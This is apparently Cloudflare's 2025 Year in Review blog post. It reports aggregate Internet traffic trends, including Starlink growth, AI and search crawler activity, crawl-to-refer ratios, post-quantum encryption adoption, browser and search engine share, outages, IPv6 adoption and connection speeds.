SpaceX Starlink’s satellite-based Internet service continues to be a popular option for bringing connectivity to unserved or underserved areas, as well as to users on planes and boats. We analyzed aggregate request traffic volumes associated with Starlink's primary autonomous system (AS14593) to track the growth in usage of the service throughout 2025. The request volume shown on the trend line in the chart represents a seven-day trailing average.

Globally, traffic from Starlink continued to see consistent growth throughout 2025, with total request volume up 2.3x across the year. We tend to see rapid traffic growth when Starlink service becomes available in a country/region, and that trend continues in 2025.

^{Starlink traffic growth in 2025, worldwide}

That’s exactly what we saw in the more than 20 new countries/regions where @Starlink announced availability: within days, Starlink traffic in those places increased rapidly. These included Armenia, Niger, Sri Lanka, and Sint Maarten.

We also saw Starlink traffic from a number of locations that are not currently marked for service availability. However, there are IPv4 and/or IPv6 prefixes associated with these countries in Starlink’s published geofeed. Given the ability for Starlink users to roam with their service (and equipment), this traffic likely comes from roaming users in those areas.

^{Starlink traffic growth in 2025, Niger}

Of countries/regions where service was active before 2025, Benin, Timor-Leste, and Botswana had some of the largest traffic growth, at 51x, 19x, and 16x respectively. Starlink service availability in Benin was first announced in November 2023, Timor-Leste in December 2024, and Botswana in August 2024.

^{Starlink traffic growth in 2025, Botswana}

Similar services, such as Amazon Leo, Eutelsat Konnect, and China’s Qianfan, continue to grow their satellite constellations and move towards commercial availability. We hope to review traffic growth across these services in the future as well.

Googlebot was again responsible for the highest volume of request traffic to Cloudflare in 2025 as it crawled millions of Cloudflare customer sites for search indexing and AI training

To look at the aggregate request traffic Cloudflare saw in 2025 from the entire IPv4 Internet, we can use a Hilbert curve, which allows us to visualize a sequence of IPv4 addresses in a two-dimensional pattern that keeps nearby IP addresses close to each other, making them useful for surveying the Internet's IPv4 address space. Within the visualization, we aggregate IPv4 addresses into /20 prefixes, meaning that at the highest zoom level, each square represents traffic from 4,096 IPv4 addresses. This level of aggregation keeps the amount of data used for the visualization manageable. See the 2024 Year in Review blog post for additional details about the visualization.

For the third year in a row, the IP address block that had the maximum request volume to Cloudflare during 2025 was Google’s 66.249.64.0/20 – one of several used by the Googlebot web crawler to retrieve content for search indexing and AI training. That a Googlebot IP address block ranked again as the top request traffic source is unsurprising, given the number of web properties on Cloudflare’s network and Googlebot’s aggressive crawling activity. The Googlebot prefix accounted for nearly 4x as much IPv4 request traffic as the next largest traffic source, 146.20.240.0/20, which is part of a larger block of IPv4 address space announced by Rackspace Hosting. As a cloud and hosting provider, Rackspace supports many different types of customers and applications, so the driver of the observed traffic to Cloudflare isn’t known.

^{Zoomed Hilbert curve view showing the address block that generated the highest volume of requests in 2025}

This year, we’ve added the ability to search for an autonomous system (ASN) to the visualization, allowing you to see how broadly a network provider’s IP address holdings are distributed across the IPv4 universe.

One example is AS16509 (AMAZON-02, used with AWS), which shows the results of Amazon’s acquisitions of large amounts of IPv4 address space over the years. Another example is AS7018 (ATT-INTERNET4, AT&T), which is one of the largest announcers of IPv4 address space in the United States. Much of the traffic we see from this ASN comes from 12.0.0.0/8, a block of over 16 million IPv4 addresses that has been owned by AT&T since 1983.

^{Hilbert curve showing the IPv4 address blocks from AS7018 that sent traffic to Cloudflare in 2025}

The share of human-generated Web traffic that is post-quantum encrypted has grown to 52%

“Post-quantum” refers to a set of cryptographic techniques designed to protect encrypted data from “harvest now, decrypt later” attacks by adversaries that have the ability to capture and store current data for future decryption by sufficiently advanced quantum computers. The Cloudflare Research team has been working on post-quantum cryptography since 2017, and regularly publishes updates on the state of the post-quantum Internet.

After seeing significant growth in 2024, the global share of post-quantum encrypted traffic nearly doubled throughout 2025, from 29% at the start of the year to 52% in early December.

^{Post-quantum encrypted TLS 1.3 traffic growth in 2025, worldwide}

Twenty-eight countries/regions saw their share of post-quantum encrypted traffic more than double throughout the year, including significant growth in Puerto Rico and Kuwait. Kuwait’s share nearly tripled, from 13% to 37%, and Puerto Rico’s share grew from 20% to 49%.

Those three were among others that saw significant share growth in mid-September, concurrent with Apple releasing operating system updates, in which “TLS-protected connections will automatically advertise support for hybrid, quantum-secure key exchange in TLS 1.3”. In Kuwait and Puerto Rico, over half of request traffic is from mobile devices, and approximately half comes from iOS devices in both locations as well, so it is not surprising that this software update resulted in a significant increase in post-quantum traffic share

^{Post-quantum encrypted TLS 1.3 traffic growth in 2025, Puerto Rico}

To that end, the share of post-quantum encrypted traffic from Apple iOS devices grew significantly in September after iOS 26 was officially released. Just four days after release, the global share of requests with post-quantum support from iOS devices grew from just under 2% to 11%. By early December, more than 25% of requests from iOS devices used post-quantum encryption.

Googlebot was responsible for more than a quarter of Verified Bot traffic

The new Bots Directory on Cloudflare Radar provides a wealth of information about Verified Bots and Signed Agents, including their operators, categories, and associated user agents, links to documentation, and traffic trends. Verified Bots must conform to a set of requirements as well as being verified through either Web Bot Auth or IP validation. A signed agent is controlled by an end user and a verified signature-agent from their Web Bot Auth implementation, and must conform to a separate set of requirements.

Googlebot is used to crawl Web site content for search indexing and AI training, and it was far and away the most active bot seen by Cloudflare throughout 2025. It was most active between mid-February and mid-July, peaking in mid-April, and was responsible for over 28% of traffic from Verified Bots. Other Google-operated bots that were responsible for notable amounts of traffic included Google AdsBot (used to monitor Web sites where Google ads are served), Google Image Proxy (used to retrieve and cache images embedded in email messages), and GoogleOther (used by various product teams for fetching publicly accessible content from sites).

OpenAI’s GPTBot, which crawls content for AI training, was the next most active bot, originating about 7.5% of Verified Bot traffic, with fairly volatile crawling activity during the first half of the year. Microsoft’s Bingbot crawls Web site content for search indexing and AI training and generated 6% of Verified Bot traffic throughout the year, showing relatively stable activity.

^{Verified Bot traffic trends in 2025, worldwide}

Search engine crawlers and AI crawlers are the two most active Verified Bot categories, with traffic patterns mapping closely to the leading bots in those categories, including GoogleBot and OpenAI’s GPTBot. Search engine crawlers were responsible for 40% of Verified Bot traffic, with AI crawlers generating half as much (20%). Search engine optimization bots were also quite active, driving over 13% of requests from Verified Bots.

^{Verified Bot traffic trends by category in 2025, worldwide}

AI insights

Crawl volume from dual-purpose Googlebot dwarfed other AI bots and crawlers

In September, a Cloudflare blog post laid out a proposal for responsible AI bot principles, one of which was “AI bots should have one distinct purpose and declare it.” In the AI bots best practices overview on Radar, we note that several bot operators have dual-purpose crawlers, including Google and Microsoft.

Because Googlebot crawls for both search engine indexing and AI training, we have included it in this year’s AI crawler overview. In 2025, its crawl volume dwarfed that of other leading AI bots. Request traffic began to increase in mid-February, peaking in late April, and then slowly declined through late July. After that, it grew gradually into the end of the year. Bingbot also has a similar dual purpose, although its crawl volume is a fraction of Googlebot’s. Bingbot’s crawl activity trended generally upwards across the year.

^{AI crawler traffic trends in 2025, worldwide}

OpenAI’s GPTBot is used to crawl content that may be used in training OpenAI's generative AI foundation models. Its crawling activity was quite volatile across the year, reaching its highest levels in June, but it ended November slightly above the crawl levels seen at the beginning of the year.

Crawl volume for OpenAI’s ChatGPT-User, which visits Web pages when users ask ChatGPT or a CustomGPT questions, saw sustained growth over the course of the year, with a weekly usage pattern becoming more evident starting in mid-February, suggesting increasing usage at schools and in the workplace. Peak request volumes were as much as 16x higher than at the beginning of the year. A drop in activity was also evident in the June to August timeframe, when many students were out of school and many professionals took vacation time.

OAI-SearchBot, which is used to link to and surface websites in search results in ChatGPT's search features, saw crawling activity grow gradually through August, then several traffic spikes in August and September, before starting to grow more aggressively heading into October, with peak request volume during a late October spike approximately 5x higher than the beginning of the year.

^{OpenAI crawler traffic trends in 2025, worldwide}

Crawling by Anthropic’s ClaudeBot effectively doubled through the first half of the year, but gradually declined during the second half, returning to a level approximately 10% higher than the start of the year. Perplexity’s PerplexityBot crawling traffic grew slowly through January and February, but saw a big jump in activity from mid-March into April. After that, growth was more gradual through October, before seeing a significant increase again in November, winding up about 3.5x higher than where it started the year.

^{ClaudeBot traffic trends in 2025, worldwide}

^{PerplexityBot traffic trends in 2025, worldwide}

ByteDance’s Bytespider, one of 2024’s top AI crawlers, saw crawling volume below several other training bots, and its activity dropped across the year, continuing the decline observed last year.

AI “user action” crawling increased by over 15x in 2025

Most AI bot crawling is done for one of three purposes: training, which gathers Web site content for AI model training; search, which indexes Web site content for search functionality available on AI platforms; and user action, which visits Web sites in response to user questions posed to a chatbot. Note that search crawling may also include crawling for Retrieval-Augmented Generation (RAG), which enables a content owner to bring their own data into LLM generation without retraining or fine-tuning a model. (A fourth “undeclared” purpose captures traffic from AI bots whose crawling purpose is unclear or unknown.)

Crawling for model training is responsible for the overwhelming majority of AI crawler traffic, reaching as much as 7-8x search crawling and 32x user action crawling at peak. The training traffic figure is heavily influenced by OpenAI’s GPTBot, and as such, it followed a very similar pattern through the year.

Crawling for search was strongest through mid-March, when it dropped by approximately 40%. It returned to more gradual growth after that, though it ended the surveyed time period just under 10% lower than the start of the year.

User action crawling started 2025 with the lowest crawl volume of the three defined purposes, but more than doubled through January and February. It again doubled in early March, and from there, it continued to grow throughout the year, up over 21x from January through early December. This growth maps very closely to the traffic trends seen for OpenAI’s ChatGPT-User bot.

^{User action crawler traffic trends in 2025, worldwide}

While other AI bots accounted for 4.2% of HTML request traffic, Googlebot alone accounted for 4.5%

AI bots have frequently been in the news during 2025 as content owners raise concerns about the amount of traffic that they are generating, especially as much of it does not translate into end users being referred back to the source Web sites. To better understand the impact of AI bot crawling activity, as compared to non-AI bots and human Web usage, we analyzed request traffic for HTML content across Cloudflare’s customer base and classified it as coming from a human, an AI bot, or another “non-AI” type of bot. (Note that because we are focusing on just HTML content here, the bot and human shares of traffic will differ from that shown on Radar, which analyzes request traffic for all content types.) Because Googlebot crawls so actively, and is dual-purpose, we have broken its share out separately in this analysis.

Throughout 2025, we found that traffic from AI bots accounted for an average of 4.2% of HTML requests. The share varied widely throughout the year, dropping as low as 2.4% in early April, and reaching as high as 6.4% in late June.

To that end, non-AI bots started 2025 responsible for half of requests to HTML pages, seven percentage points above human-generated traffic. This gap grew as wide as 25 percentage points during the first few days of June. However, these traffic shares began to draw closer together starting in mid June, and starting on September 11, entered a period where the human generated share of HTML traffic sometimes exceeded that of non-AI bots. As of December 2, human traffic generated 47% of HTML requests, and non-AI bots generated 44%.

Googlebot is a particularly voracious crawler, and this year it originated 4.5% of HTML requests, a share slightly larger than AI bots in aggregate. Starting the year at just under 2.5%, its share ramped quickly over the next four months, peaking at 11% in late April. It subsequently fell back towards its starting point over the next several months, and then grew again during the second half of the year, ending with a 5% share. This share shift largely mirrors Googlebot’s crawling activity as discussed above.

^{HTML traffic shares by bot type in 2025, worldwide}

Anthropic had the highest crawl-to-refer ratio among the leading AI and search platforms

We launched the crawl-to-refer ratio metric on Radar on July 1 to track how often a given AI or search platform sends traffic to a site relative to how often it crawls that site. A high ratio means a whole lot of AI crawling without sending actual humans to a Web site.

It can be a volatile metric, with the values shifting day-by-day as crawl activity and referral traffic change. This metric compares total number of requests from relevant user agents associated with a given search or AI platform where the response was of Content-type: text/html by the total number of requests for HTML content where the Referer header contained a hostname associated with a given search or AI platform.

Anthropic had the highest crawl-to-refer ratios this year, reaching as much as 500,000:1, although they were quite erratic from January through May. Both the magnitude and erratic nature of the metric was likely due to sparse referral traffic over that time period. After that, the ratios became more consistent, but remained higher than others, ranging from ~25,000:1 to ~100,000:1.

OpenAI’s ratios over time were quite spiky, and reached as much as 3,700:1 in March. These shifts may be due to the stabilization of GPTBot crawling activity, coupled with increased usage of ChatGPT search functionality, which includes links back to source Web sites within its responses. Users following those links would increase Referer counts, potentially lowering the ratio. (Assuming that crawl traffic wasn’t increasing at a similar or greater rate.)

Perplexity had the lowest crawl-to-refer ratios of the major AI platforms, starting the year below 100:1 before spiking in late March above 700:1, concurrent with a spike of crawl traffic seen from PerplexityBot. Settling back down after the spike, peak ratio values generally remained below 400:1, and below 200:1 from September onwards.

Among search platforms, Microsoft’s ratio unexpectedly exhibited a cyclical weekly pattern, reaching its lowest levels on Thursdays, and peaking on Sundays. Peak ratio values were generally in the 50:1 to 70:1 range across the year. Starting the year just over 3:1, Google’s crawl-to-refer ratio increased steadily through April, reaching as high as 30:1. After peaking, it fell somewhat erratically through mid-July, dropping back to 3:1, although it has been slowly increasing through the latter half of 2025. DuckDuckGo’s ratio remained below 1:1 for the first three calendar quarters of 2025, but experienced a sudden jump to 1.5:1 in mid-October and stayed elevated for the remainder of the period.

^{AI & search platform crawl-to-refer ratios in 2025, worldwide}

AI crawlers were the most frequently fully disallowed user agents found in robots.txt files

The robots.txt file, formally defined in RFC 9309 as the Robots Exclusion Protocol, is a text file that content owners can use to signal to Web crawlers which parts of a Web site the crawlers are allowed to access, using directives to explicitly allow or disallow search and AI crawlers from their whole site, or just parts of it. The directives within the file are effectively a “keep out” sign and don’t provide any formal access control. Having said that, Cloudflare’s managed robots.txt feature automatically updates a site’s existing robots.txt or creates a robots.txt file on the site that includes directives asking popular AI bot operators to not use the content for AI model training. In addition, our AI Crawl Control capabilities can track violations of a site’s robots.txt directives, and give the site owner the ability to block requests from the offending user agent.

On Cloudflare Radar, we provide insight into the number of robots.txt files found among our top 10,000 domains and the full/partial disposition of the allow and disallow directives found within the files for selected crawler user agents. (In this context, “full” refers to directives that apply to the whole site, and “partial” refers to directives that apply to specified paths or file types.) Within the Year in Review microsite, we show how the disposition of these directives changed over the course of 2025.

The user agents with the highest number of fully disallowed directives are those associated with AI crawlers, including GPTBot, ClaudeBot, and CCBot. The directives for Googlebot and Bingbot crawlers, used for both search indexing and AI training, leaned heavily towards partial disallow, likely focused on cordoning off login endpoints and other non-content areas of a site. For these two bots, directives applying to the whole site remained a small fraction of the total number of disallow directives observed through the year.

^{Robots.txt disallow directives by user agent}

The number of explicit allow directives found across the discovered robots.txt files was a fraction of the observed disallow directives, likely because allow is the default policy, absent any specific directive. Googlebot had the largest number of explicit allow directives, although over half of them were partial allows. Allow directives targeting AI crawlers were found across fewer domains, with directives targeting OpenAI’s crawlers leaning more towards explicit full allows.

Google-Extended is a user agent token that web publishers can use to manage whether content that Google crawls from their sites may be used for training Gemini models or providing site content from the Google Search index to Gemini, and the number of allow directives targeting it tripled during the year — most partially allowed access at the start of the year, while the end of the year saw a larger number of directives that explicitly allowed full site access than those that allowed access to just some of the site’s content.

^{Robots.txt allow directives by user agent}

On Workers AI, Meta’s llama-3-8b-instruct model was the most popular model, and text generation was the most popular task type

The AI model landscape is rapidly evolving, with providers regularly releasing more powerful models, capable of tasks like text and image generation, speech recognition, and image classification. Cloudflare collaborates with AI model providers to ensure that Workers AI supports these models as soon as possible following their release, and we recently acquired Replicate to greatly expand our catalog of supported models. In February 2025, we introduced visibility on Radar into the popularity of publicly available supported models as well as the types of tasks that these models perform, based on customer account share.

Throughout the year, Meta’s llama-3-8b-instruct model was dominant, with an account share (36.3%) more than three times larger than the next most popular models, OpenAI’s whisper (10.1%) and Stability AI’s stable-diffusion-xl-base-1.0 (9.8%). Both Meta and BAAI (Beijing Academy of Artificial Intelligence) had multiple models among the top 10, and the top 10 models had an account share of 89%, with the balance spread across a long tail of other models.

^{Most popular models on Workers AI in 2025, worldwide}

Task popularity was driven in large part by the top models, with text generation, text-to-image, and automatic speech recognition topping the list. Text generation was used by 48.2% of Workers AI customer accounts, nearly four times more than the text-to-image share of 12.3% and automatic speech recognition’s 11.0% share.

^{Most popular tasks on Workers AI in 2025, worldwide}

What’s being crawled

In addition to the year-to-date analysis presented above, below we present point-in-time analyses of what is being crawled. Note that these insights are not included in the Year in Review microsite.

Crawling by geographic region

Within the AI section of Year in Review, we are looking at traffic from AI bots and crawlers globally, without regard for the geography associated with the account that owns the content being crawled. If we drill down a level geographically, using data from October 2025, and look at which bots generate the most crawling traffic for sites owned by customers with a billing address in a given geographic region, we find that Googlebot accounts for between 35% and 55% of crawler traffic in each region.

OpenAI’s GPTBot or Microsoft’s Bingbot are second most active, with crawling shares of 13-14%. In the developed economies across North America, Europe, and Oceania, Bingbot maintains a solid lead over AI crawlers. But for sites based in fast-growing markets across South America and Asia, GPTBot holds a slimmer lead over Bingbot.

Geographic region	Top crawlers
North America	Googlebot (45.5%) Bingbot (14.0%) Meta-ExternalAgent (7.7%)
South America	Googlebot (44.2%) GPTBot (13.8%) Bingbot (13.5%)
Europe	Googlebot (48.6%) Bingbot (13.2%) GPTBot (10.8%)
Asia	Googlebot (39.0%) GPTBot (14.0%) Bingbot (12.6%)
Africa	Googlebot (35.8%) Bingbot (13.7%) GPTBot (13.1%)
Oceania	Googlebot (54.2%) Bingbot (13.8%) GPTBot (6.6%)

Crawling by industry

In analyzing AI crawler activity by customer industry during October 2025, we found that Retail and Computer Software consistently attracted the most AI crawler traffic, together representing just over 40% of all activity.

Others in the top 10 accounted for much smaller shares of crawling activity. These top 10 industries accounted for just under 70% of crawling, with the balance spread across a long tail of other industries.

^{Industry share of AI crawling activity, October 2025}

Adoption & usage

iOS devices generated 35% of mobile device traffic globally – and more than half of device traffic in many countries

The two leading mobile device operating systems globally are Apple’s iOS and Google’s Android. By analyzing information in the User-Agent header included with each Web request, we can calculate the distribution of traffic by client operating system throughout the year. Android devices generate the majority of mobile device traffic globally, due to the wide distribution of price points, form factors, and capabilities of such devices.

Globally, the share of traffic from iOS grew slightly year-over-year, up two percentage points to 35% in 2025. Looking at the top countries for iOS traffic share, Monaco had the highest share, at 70%, and iOS drove 50% or more of mobile device traffic in a total of 30 countries/regions, including Denmark (65%), Japan (57%), and Puerto Rico (52%).

^{Distribution of mobile device traffic by operating system in 2025, worldwide}

For countries/regions with higher Android usage, the shares were significantly larger. Twenty-seven had Android adoption above 90% in 2025, with Papua New Guinea the highest at 97%. Sudan, Malawi, Bangladesh, and Ethiopia also registered an Android share of 95% or more. Android was responsible for 50% or more of mobile device traffic in 175 countries/regions, with the Bahamas’ 51% share placing it at the bottom of that list.

^{Distribution of iOS and Android usage in 2025}

The shares of global Web requests using HTTP/3 and HTTP/2 both increased slightly in 2025

HTTP (HyperText Transfer Protocol) is the protocol that makes the Web work. Over the last 30+ years, it has gone through several major revisions. The first standardized version, HTTP/1.0, was adopted in 1996, HTTP/1.1 in 1999, and HTTP/2 in 2015. HTTP/3, standardized in 2022, marked a significant update, running on top of a new transport protocol known as QUIC. Using QUIC as its underlying transport allows HTTP/3 to establish connections more quickly, as well as deliver improved performance by mitigating the effects of packet loss and network changes. Because it also provides encryption by default, using HTTP/3 mitigates the risk of attacks.

Globally in 2025, 50% of requests to Cloudflare were made over HTTP/2, HTTP/1.x accounted for 29%, and the remaining 21% were made via HTTP/3. These shares are largely unchanged from 2024 — HTTP/2 and HTTP/3 gained just fractions of a percentage point this year.

^{Distribution of traffic by HTTP version in 2025, worldwide}

Geographically, usage of HTTP/3 appears to be both increasing and spreading. Last year, we noted that we had found eight countries/regions sending more than a third of their requests over HTTP/3. In 2025, 15 countries/regions sent more than a third of requests over HTTP/3, with Georgia’s 38% adoption just exceeding 2024’s top adoption rate of 37% in Réunion. (Looking at historical data, Georgia started the year around 46% HTTP/3 adoption, but dropped through the first half of the year before leveling off.) Armenia had the largest increase in HTTP/3 adoption year-over-year, jumping from 25% to 37%.

Seven countries/regions saw overall HTTP/3 usage levels below 10% due to high levels of bot-originated HTTP/1.x traffic. These include Hong Kong, Dominica, Singapore, Ireland, Iran, Seychelles, and Gibraltar.

JavaScript-based libraries and frameworks remained integral tools for building Web sites

To deliver a modern Web site, developers must capably integrate a growing collection of libraries and frameworks with third-party tools and platforms. All of these components must work together to ensure a performant, feature-rich, problem-free user experience. As in past years, we used Cloudflare Radar’s URL Scanner to scan Web sites associated with the top 5,000 domains to identify the most popular technologies and services used across eleven categories.

jQuery is self-described as a fast, small, and feature-rich JavaScript library, and our scan found it on 8x as many sites as Slick, a JavaScript library used to display image carousels. React remained the top JavaScript framework used for building Web interfaces, found on twice as many scanned sites as Vue.js. PHP, node.js, and Java remained the most popular programming languages/technologies, holding a commanding lead over other languages, including Ruby, Python, Perl, and C.

^{Top Web site technologies, JavaScript libraries category in 2025}

WordPress remained the most popular content management system (CMS), though its share of scanned sites dropped to 47%, with the difference distributed across gains seen by multiple challengers. HubSpot and Marketo remained the top marketing automation platforms, with a combined share 10% higher YoY. Among A/B testing tools, VWO’s share grew by eight percentage points year-over-year, extending its lead over Optimizely, while Google Optimize, which was sunsetted in September 2023, saw its share fall from 14% to 4%.

One-fifth of automated API requests were made by Go-based clients

Application programming interfaces (APIs) are the foundation of modern dynamic Web sites and both Web-based and native applications. These sites and applications rely heavily on automated API calls to provide customized information. Analyzing the Web traffic protected and delivered by Cloudflare, we can identify requests being made to API endpoints. By applying heuristics to these API-related requests determined to not be coming from a person using a browser or native mobile application, we can identify the top languages used to build API clients.

In 2025, 20% of automated API requests were made by Go-based clients, representing significant growth from Go’s 12% share in 2024. Python’s share also increased year-over-year, growing from 9.6% to 17%. Java jumped to third place, reaching an 11.2% share, up from 7.4% in 2024. Node.js, last year’s second-most popular language, saw its share fall to just 8.3% in 2025, pushing it down to fourth place, while .NET remained at the bottom of the top five, dropping to just 2.3%.

^{Most popular automated API client languages in 2025}

Google remains the top search engine, with Yandex, Bing, and DuckDuckGo distant followers

Cloudflare is in a unique position to measure search engine market share because we protect websites and applications for millions of customers. To that end, since the fourth quarter of 2021, we have been publishing quarterly reports on this data. We use the HTTP referer header to identify the search engine sending traffic to customer sites and applications, and present the market share data as an overall aggregate, as well as broken out by device type and operating system. (Device type and operating system insights are based on the User-Agent and Client Hints HTTP request headers.)

Globally, Google referred the most traffic to sites protected and delivered by Cloudflare, with a nearly 90% share in 2025. The other search engines in the top 5 include Bing (3.1%), Yandex (2.0%), Baidu (1.4%), and DuckDuckGo (1.2%). Looking at trends across the year, Yandex dropped from a 2.5% share in May to a 1.5% share in July, while Baidu grew from 0.9% in April to 1.6% in June.

^{Overall search engine market share in 2025, worldwide}

Yandex users are primarily based in Russia, where the domestic platform holds a 65% market share, almost double that of Google at 34%. In the Czech Republic, users prefer Google (84%), but local search engine Seznam’s 7.7% share is a strong showing compared to the second place search engines in other countries.

^{Overall search engine market share in 2025, Czech Republic}

For traffic from “desktop” systems aggregated globally, Google’s market share drops to about 80%, while Bing’s jumps to nearly 11%. This is likely driven by the continued market dominance of Windows-based systems: On Windows, Google refers just 76% of traffic, while Bing refers about 14%. For traffic from mobile devices, Google holds almost 93% of market share, with the same share seen for traffic from both Android and iOS devices.

^{Overall search engine market share in 2025, Windows-based systems}

For additional details, including search engines aggregated under “Other”, please refer to the quarterly Search Engine Referral Reports on Cloudflare Radar.

Chrome remains the top browser across platforms and operating systems – except on iOS, where Safari has the largest share

Cloudflare is also in a unique position to measure browser market share, and we have been publishing quarterly reports on the topic for several years. To identify the browser and associated operating system making content requests, we use information from the User-Agent and Client Hints HTTP headers. We present browser market share data as an overall aggregate, as well as broken out by device type and operating system. Note that the shares of browsers available on both desktop and mobile devices, such as Google Chrome or Apple Safari, are presented in aggregate.

Globally, two-thirds of request traffic to Cloudflare came from Chrome in 2025, similar to its share last year. Safari, available exclusively on Apple devices, was the second most-popular browser, with a 15.4% market share. They were followed by Microsoft Edge (7.4%), Mozilla Firefox (3.7%) and Samsung Internet (2.3%).

^{Overall browser market share in 2025, worldwide}

In Russia, Chrome remains the most popular with a 44% share, but the domestic Yandex Browser comes in a strong second with a 33% market share, as compared to the sub-10% shares for Safari, Edge, and Opera. Interestingly, the Yandex Browser actually beat Chrome by a percentage point (39% to 38%) in June before giving up significant market share to Chrome as the year progressed.

^{Overall browser market share in 2025, Russia}

As the default browser on iOS, Safari is far and away the most popular on such devices, with a 79% market share, four times Chrome’s 19% share. Less than 1% of requests come from DuckDuckGo, Firefox, and QQ Browser (developed in China by Tencent). In contrast, on Android, 85% of requests are from Chrome, while vendor-provided Samsung Internet is a distant second with a 6.6% share. Huawei Browser, another vendor-provided browser, is third at just 1%. And despite being the default browser on Windows, Edge’s 19% share pales in comparison to Chrome, which leads with a 69% share on that operating system.

^{Overall browser market share in 2025, iOS devices}

For additional details, including browsers aggregated under “Other”, please refer to the quarterly Browser Market Share Reports on Cloudflare Radar.

Connectivity

Almost half of the 174 major Internet outages observed around the world in 2025 were due to government-directed regional and national shutdowns of Internet connectivity

Internet outages continue to be an ever-present threat, and the potential impact of these outages continues to grow, as they can lead to economic losses, disrupted educational and government services, and limited communications. During 2025, we covered significant Internet disruptions and their associated causes in our quarterly summary posts (Q1, Q2, Q3) as well standalone posts covering major outages in Portugal & Spain and Afghanistan. The Cloudflare Radar Outage Center tracks these Internet outages, and uses Cloudflare traffic data for insights into their scope and duration.

Nearly half of the observed outages this year were related to Internet shutdowns intended to prevent cheating on academic exams. Countries including Iraq, Syria, and Sudan again implemented regular multi-hour shutdowns over the course of several weeks during exam periods. Other government-directed shutdowns in Libya and Tanzania were implemented in response to protests and civil unrest, while in Afghanistan, the Taliban ordered the shutdown of fiber optic Internet connectivity in multiple provinces as part of a drive to “prevent immorality.”

Cable cuts, affecting both submarine and domestic fiber optic infrastructure, were also a leading cause of Internet disruptions in 2025. These cuts resulted in network providers in countries/regions including the United States, South Africa, Haiti, Pakistan, and Hong Kong experiencing service disruptions lasting from several hours to several days. Other notable outages include one caused by a fire in a telecom building in Cairo, Egypt, which disrupted Internet connectivity across multiple service providers for several days, and another in Jamaica, where damage caused by Hurricane Melissa resulted in lower Internet traffic from the island for over a week.

Within the timeline on the Year in Review microsite, hovering over a dot will display information about that outage, and clicking on it will link to additional insights.

^{Over 170 major Internet outages were observed around the world during 2025}

Globally, less than a third of dual-stack requests were made over IPv6, while in India, over two-thirds were

Available IPv4 address space has been largely exhausted for a decade or more, though solutions like Network Address Translation have enabled network providers to stretch limited IPv4 resources. This has served in part to slow the adoption of IPv6, designed in the mid-1990s as a successor protocol to IPv4, and offers an expanded address space intended to better support the expected growth in the number of Internet-connected devices.

For nearly 15 years, Cloudflare has been a vocal and active advocate for IPv6 as well, launching solutions including Automatic IPv6 Gateway in 2011, which enabled free IPv6 support for all of our customers and IPv6 support by default for all of our customers in 2014. Simplistically, server-side support is only half of what is needed to drive IPv6 adoption, because end user connections need to support it as well. By aggregating and analyzing the IP version used for requests made to Cloudflare across the year, we can get insight into the distribution of traffic across IPv6 and IPv4.

Globally, 29% of IPv6-capable (“dual-stack”) requests for content were made over IPv6, up a percentage point from 28% in 2024. India again topped the list with an IPv6 adoption rate of 67%, followed by just three other countries/regions (Malaysia, Saudi Arabia, and Uruguay) that also made more than half of such requests over IPv6, the same as last year. Some of the largest gains were seen in Belize, which grew from 4.3% to 24% year-over-year, and Qatar, which saw its adoption nearly double to 33% in 2025. Unfortunately, some countries/regions still lag the leaders, with 94 seeing adoption rates below 10%, including Russia (8.6%), Ireland (6.5%), and Hong Kong (3.0%). Even further behind are the 20 countries/regions with adoption rates below 1%, including Tanzania (0.9%), Syria (0.3%), and Gibraltar (0.1%).

^{Distribution of traffic by IP version in 2025, worldwide}

^{Top five countries for IPv6 adoption in 2025}

European countries had some of the highest download speeds, all above 200 Mbps. Spain remained consistently among the top locations across measured Internet quality metrics

Over the past decade or so, we have turned to Internet speed tests for many purposes: keeping our service providers honest, troubleshooting a problematic connection, or showing off a particularly high download speed on social media. In fact, we’ve become conditioned to focus on download speeds as the primary measure of a connection’s quality. While it is absolutely an important metric, for increasingly popular use cases — like videoconferencing, live-streaming, and online gaming — strong upload speeds and low latency are also critical. However, even when Internet providers offer service tiers that include high symmetric speeds and lower latency, consumer adoption is often mixed due to cost, availability, or other issues.

Tests on speed.cloudflare.com measure both download and upload speeds, as well as loaded and unloaded latency. By aggregating the results of tests taken around the world during 2025, we can get a country/region perspective on average values for these connection quality metrics, as well as insight into the distribution of the measurements.

Europe was well-represented among those with the highest average download speeds in 2025. Spain, Hungary, Portugal, Denmark, Romania, and France were all in the top 10, with both Spain and Hungary averaging download speeds above 300 Mbps. Spain’s average grew by 25 Mbps from 2024, while Hungary’s jumped 46 Mbps. Meanwhile, Asian countries had many of the highest average upload speeds, with South Korea, Macau, Singapore, and Japan reaching the top 10, all seeing averages in excess of 130 Mbps.

But it was Spain that topped the list for the upload metric as well at 206 Mbps, up 13 Mbps from 2024. The country’s strong showing across both speed metrics is potentially attributable to “UNICO-Broadband,” a “call for projects by telecommunications operators aiming at the deployment of high-speed broadband infrastructure capable of providing services at symmetric speeds of at least 300 Mbps, scalable at 1 Gbps,” which aimed to cover 100 % of the population in 2025.

^{Countries/regions with the highest download speeds in 2025, worldwide}

As noted above, low latency connections are needed to provide users with good gaming and videoconferencing/streaming experiences. The latency metric can be broken down into loaded and idle latency. The former measures latency on a loaded connection, where bandwidth is actively being consumed, while the latter measures latency on an “idle” connection, when there is no other network traffic present. (These definitions are from the speed test application’s perspective.)

In 2025, a number of European countries were among those with both the lowest idle and loaded latencies. For average idle latency, Iceland measured the lowest at 13 ms, just 2 ms better than Moldova. In addition to these two, Portugal, Spain, and Hungary also ranked among the top 10, all with average idle latencies below 20 ms. Moldova topped the list of countries/regions with the lowest average loaded latency, at 73 ms. Hungary, Spain, Belgium, Portugal, Slovakia, and Slovenia were also part of the top 10, all with average loaded latencies below 100 ms.

^{Measured idle/loaded latency, Moldova}

London and Los Angeles were hotspots for Cloudflare speed test activity in 2025

As we discussed above, the speed test at speed.cloudflare.com measures a user’s connection speeds and latency. We reviewed the aggregate findings from those tests, highlighting the countries/regions with the best results. However, we also wondered about test activity around the world -– where are users most concerned about their connection quality, and how frequently do they perform tests? A new animated Year in Review visualization illustrates speed test activity, aggregated weekly.

Data is aggregated at a regional level and the associated activity is plotted on the map, with circles sized based on the number of tests taken each week. Note that locations with fewer than 100 speed tests per week are not plotted. Looking at test volume across the year, the greater London and Los Angeles areas were most active, as were Tokyo and Hong Kong and several U.S. cities.

